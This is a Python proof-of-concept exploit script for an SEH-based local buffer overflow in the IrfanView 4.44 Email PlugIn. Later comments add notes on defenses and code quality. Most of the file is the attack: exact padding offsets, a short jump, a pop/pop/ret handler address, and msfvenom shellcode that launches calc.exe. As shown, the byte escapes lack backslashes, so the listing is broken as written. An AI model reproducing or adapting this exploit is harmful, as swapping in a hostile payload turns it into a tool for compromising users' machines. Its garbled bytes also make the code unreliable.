#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.44 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.44
# Software Link: http://www.irfanview.info/files/irfanview_444.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#

# Builds the proof-of-concept input described in the header: one long string
# written to irfan.txt, which the PoC steps paste into the Email PlugIn's
# "Full Name" setting.
#
# NOTE(review): every "xNN" literal below lacks a backslash, so as shown they
# are plain ASCII text ("x41" is the three characters x, 4, 1), not one-byte
# escapes. This looks like escaping lost when the page was extracted; confirm
# against the original advisory. The sizes and offsets in the comments are the
# author's stated intent, not what this listing would emit as written.
#
# Defender context: the title describes a stack overflow that reaches the
# structured exception handler (SEH) record. Generic mitigations for this class
# are SafeSEH/SEHOP, DEP and ASLR on every loaded module, plus bounds-checking
# the field in the plugin itself. The page does not name a fixed version.
# A useful detection signal is the image viewer crashing or spawning an
# unexpected child process right after the email settings dialog is used.
filename="irfan.txt"

# Padding intended to fill the buffer up to the SEH record (1236 repetitions).
junk = "x41"*1236

# Next-SEH field. The author's note "jump 6" indicates a short forward jump
# over the handler pointer, padded to four bytes.
#jump 6
nseh = "xebx06x90x90"

# SEH handler pointer. The author's note gives the address of a
# pop/pop/ret sequence. Presumably it sits in a module built without SafeSEH
# and loaded at a fixed base, but the page does not say which module: verify.
#0x10021420 : pop ebp # pop ebx # ret
seh = "x20x14x02x10"

# Payload generated by the author with the command below. It is a benign
# demonstrator (launches calc.exe) that avoids the listed bad characters.
#msfvenom -p windows/exec CMD=calc.exe -b "x00x0ax0d" -f c
#Payload size: 220 bytes
calc = (
"xdaxdfxbax32x98xc1x8exd9x74x24xf4x58x31xc9xb1"
"x31x83xe8xfcx31x50x14x03x50x26x7ax34x72xaexf8"
"xb7x8bx2ex9dx3ex6ex1fx9dx25xfax0fx2dx2dxaexa3"
"xc6x63x5bx30xaaxabx6cxf1x01x8ax43x02x39xeexc2"
"x80x40x23x25xb9x8ax36x24xfexf7xbbx74x57x73x69"
"x69xdcxc9xb2x02xaexdcxb2xf7x66xdex93xa9xfdxb9"
"x33x4bxd2xb1x7dx53x37xffx34xe8x83x8bxc6x38xda"
"x74x64x05xd3x86x74x41xd3x78x03xbbx20x04x14x78"
"x5bxd2x91x9bxfbx91x02x40xfax76xd4x03xf0x33x92"
"x4cx14xc5x77xe7x20x4ex76x28xa1x14x5dxecxeaxcf"
"xfcxb5x56xa1x01xa5x39x1exa4xadxd7x4bxd5xefxbd"
"x8ax6bx8axf3x8dx73x95xa3xe5x42x1ex2cx71x5bxf5"
"x09x8dx11x54x3bx06xfcx0cx7ex4bxffxfaxbcx72x7c"
"x0fx3cx81x9cx7ax39xcdx1ax96x33x5excfx98xe0x5f"
"xdaxfax67xccx86xd2x02x74x2cx2b")

# Trailing filler appended after the payload (1000 repetitions).
fill = "x44"*1000

# Final layout, in order: padding, next-SEH field, handler pointer, payload,
# trailing filler.
# NOTE(review): `buffer` shadows the Python 2 builtin of the same name.
buffer = junk + nseh + seh + calc + fill

# Write the string to irfan.txt in text mode, overwriting any existing file.
# The handle is closed explicitly and is not protected by try/finally or `with`.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()